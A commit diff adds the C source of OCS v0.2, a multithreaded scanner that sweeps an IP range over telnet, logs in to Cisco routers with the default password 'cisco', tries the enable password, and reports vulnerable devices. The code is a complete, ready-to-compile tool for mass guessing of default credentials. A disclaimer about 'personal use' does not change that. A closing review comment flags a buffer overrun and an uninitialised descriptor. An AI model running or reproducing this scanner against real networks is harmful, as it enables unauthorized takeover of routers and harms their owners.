
Commit 1f7bf46

committed
added source code for cisco-ocs
1 parent 4cf9578 commit 1f7bf46


1 file changed

+339
-0
lines changed


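--- a/OCS-0.2.c
+++ b/OCS-0.2.c
@@ -0,0 +1,339 @@
+/*
+Author: OverIP
+Andrea Piscopiello
+
+Source: OCS v 0.2
+License: GPL
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+Email: Write me for any problem or suggestion at: [email protected]
+Date: 09/08/2004
+Read me: Just compile it with:
+
+gcc ocs.c -o ocs -lpthread
+
+Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy
+xxx.xxx.xxx.xxx=range start IP
+yyy.yyy.yyy.yyy=range end IP
+
+PAY ATTENTION: This source is coded for only personal use on
+your own router Cisco. Don't hack around.
+
+Special thanks to:
+Khlero with your patience this code is out there :*
+Shen139, without you I can't live :D
+people that helped betatesting this code :)
+Alex Kah (alex at question-defense dot com) from Question-Defense.com and his Cisco Router :)
+I love U all :*
+*/
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <string.h>
+#include <signal.h>
+
+
+int i=0;
+int j=0;
+int k=0;
+int l=0;
+
+
+char buffer_a[700];
+char buffer_b[700];
+char buffer_c[700];
+char tmpIP[16];
+
+pthread_t threadname;
+
+
+void callScan() // scanning
+{
+scanna(tmpIP);
+pthread_exit(0);
+}
+
+
+static void funcAlarm() //alarm
+{
+pthread_exit(0);
+}
+
+
+int setnonblock(int sock) //setta socket non bloccanti
+{
+struct timeval timeout;
+
+timeout.tv_sec = 10;
+timeout.tv_usec = 0;
+if (setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,(char*) &timeout, sizeof(timeout)))
+return 0;
+return 1;
+}
+
+
+void init(struct sockaddr_in *address,int port,int IP)
+{
+address->sin_family=AF_INET;
+address->sin_port=htons((u_short)port);
+address->sin_addr.s_addr=IP;
+}
+
+
+int scanna(char*rangeIP) //scanning
+{
+int error;
+int sd;
+
+struct sockaddr_in server;
+
+close(sd);
+
+server.sin_family=AF_INET;
+server.sin_port=htons(23);
+server.sin_addr.s_addr=inet_addr(rangeIP);
+
+sd=socket(AF_INET,SOCK_STREAM,0);
+if(sd==-1)
+{
+printf("Socket Error(%s)\n",rangeIP);
+close(sd);
+pthread_exit(0);
+}
+
+// setnonblock(sd);
+signal(SIGALRM,funcAlarm);
+alarm(7);
+fflush(stdout);
+
+error=connect(sd,(struct sockaddr*)&server,sizeof(server));
+if(error==0)
+{
+printf("\n\n-%s\n",rangeIP);
+fflush(stdout);
+memset(buffer_c, '\0',700);
+recv(sd,buffer_c,700,0);
+printf(" |Logging... %s\n",rangeIP);
+fflush(stdout);
+memset(buffer_a, '\0',700);
+memset(buffer_b, '\0',700);
+
+send(sd,"cisco\r",6,0);
+
+sleep(1);
+
+recv(sd,buffer_a,700,0);
+
+if(strstr(buffer_a,"#"))
+printf(" |Default Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
+else
+if(strstr(buffer_a,">"))
+{
+printf(" |Default Telnet password found. %s\n",rangeIP);
+fflush(stdout);
+send(sd,"enable\r",7,0);
+
+sleep(1);
+
+send(sd,"cisco\r",6,0);
+
+sleep(1);
+
+recv(sd,buffer_b,700,0);
+//printf(" Sto cercando di loggarmi in enable mode\n");
+//fflush(stdout);
+}
+if(strstr(buffer_b,"#"))
+printf(" |Default Telnet and Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
+
+else
+
+printf(" |Router not vulnerable. \n");
+fflush(stdout);
+}
+else
+{
+printf("\n\n(%s) Filtered Ports\n",rangeIP);
+close(sd);
+alarm(0);
+signal(SIGALRM,NULL);
+pthread_exit(0);
+}
+
+close(sd);
+fflush(stdout);
+alarm(0);
+signal(SIGALRM,NULL);
+pthread_exit(0);
+}
+
+
+char *getByte(char *IP,int index);
+
+int function1(char* IP, char* IP2)
+{
+
+char rangeIP[16];
+
+pid_t pid;
+i=atoi(getByte(IP,1));
+j=atoi(getByte(IP,2));
+k=atoi(getByte(IP,3));
+l=atoi(getByte(IP,4));
+
+while(1)
+{
+
+sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
+strcpy(tmpIP,rangeIP);
+if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
+{
+printf("+ Thread error:\n");
+perror(" - pthread_create() ");
+exit(0);
+}
+fflush(stdout);
+pthread_join(threadname, NULL);
+fflush(stdout);
+l++;
+if (l==256)
+{
+l=0;
+k++;
+if (k==256)
+{
+k=0;
+j++;
+if (j==256)
+{
+j=0;
+i++;
+}
+}
+}
+
+if(i==atoi(getByte(IP2,1)) && j==atoi(getByte(IP2,2)) && k==atoi(getByte(IP2,3)) && l==atoi(getByte(IP2,4)))
+{
+break;
+}
+
+}
+
+sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
+strcpy(tmpIP,rangeIP);
+fflush(stdout);
+if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
+{
+printf("+ Thread error:\n");
+perror(" - pthread_create() ");
+exit(0);
+}
+pthread_join(threadname, NULL);
+
+fflush(stdout);
+}
+
+
+int main(int argc,char *argv[])
+{
+
+int w;
+
+printf("********************************* OCS v 0.2 **********************************\n");
+printf("**** ****\n");
+printf("**** coded by OverIP ****\n");
+printf("**** [email protected] ****\n");
+printf("**** under GPL License ****\n");
+printf("**** ****\n");
+printf("**** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy ****\n");
+printf("**** ****\n");
+printf("**** xxx.xxx.xxx.xxx = range start IP ****\n");
+printf("**** yyy.yyy.yyy.yyy = range end IP ****\n");
+printf("**** ****\n");
+printf("******************************************************************************\n");
+
+if(argc!=3)
+
+{
+printf("use: %s IP IP\n",argv[0]);
+exit(-1);
+}
+
+for(w=1;w<=5;w++)
+if(atoi(getByte(argv[1],w))>255 || atoi(getByte(argv[2],w))>255)
+{
+printf("use: ./OCS IP IP\n");
+exit (-1);
+}
+
+
+for(w=1;w<=5;w++)
+if(atoi(getByte(argv[1],w))<atoi(getByte(argv[2],w)))
+{
+function1(argv[1],argv[2]);
+return 0;
+}
+
+else if(atoi(getByte(argv[1],w))>atoi(getByte(argv[2],w)))
+{
+printf("use: %s IP IP\n",argv[0]);
+return 0;
+}
+
+
+printf("Same IPs \n");
+fflush(stdout);
+scanna(argv[1]);
+return 0;
+}
+
+
+char *getByte(char *IP,int index)
+{
+
+int i=0;
+int separator=0;
+static char byte[3];
+
+for(i=0;i<4;i++)
+byte[i]='\0';
+memset(byte,0,sizeof(byte));
+
+for(i=0;i<strlen(IP);i++)
+{
+
+if((IP[i]=='.') && (separator==index-1))
+
+{
+return byte;
+}
+
+else
+if(IP[i]=='.')
+
+{
+separator++;
+}
+
+else
+if (separator==index-1)
+
+{
+strncat(byte,&IP[i],1);
+}
+
+}
+
+return byte;
+}
+
+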
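Review bot: `getByte` writes past its own buffer. `static char byte[3]` cannot hold a three-digit octet plus the terminator, the clearing loop `for(i=0;i<4;i++) byte[i]='\0';` already stores to `byte[3]`, and `strncat(byte,&IP[i],1)` appends every character of the selected field with no length limit. Because `main` calls it on `argv[1]` and `argv[2]` before any range check, an overlong field on the command line overruns static storage. Declare `static char byte[4];`, drop the redundant loop in favour of the existing `memset`, and guard the append with `if (strlen(byte) < sizeof(byte) - 1) strncat(byte, &IP[i], 1);`. Separately, `scanna` calls `close(sd)` while `sd` is still uninitialised, which can close an unrelated descriptor; that line should be removed.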
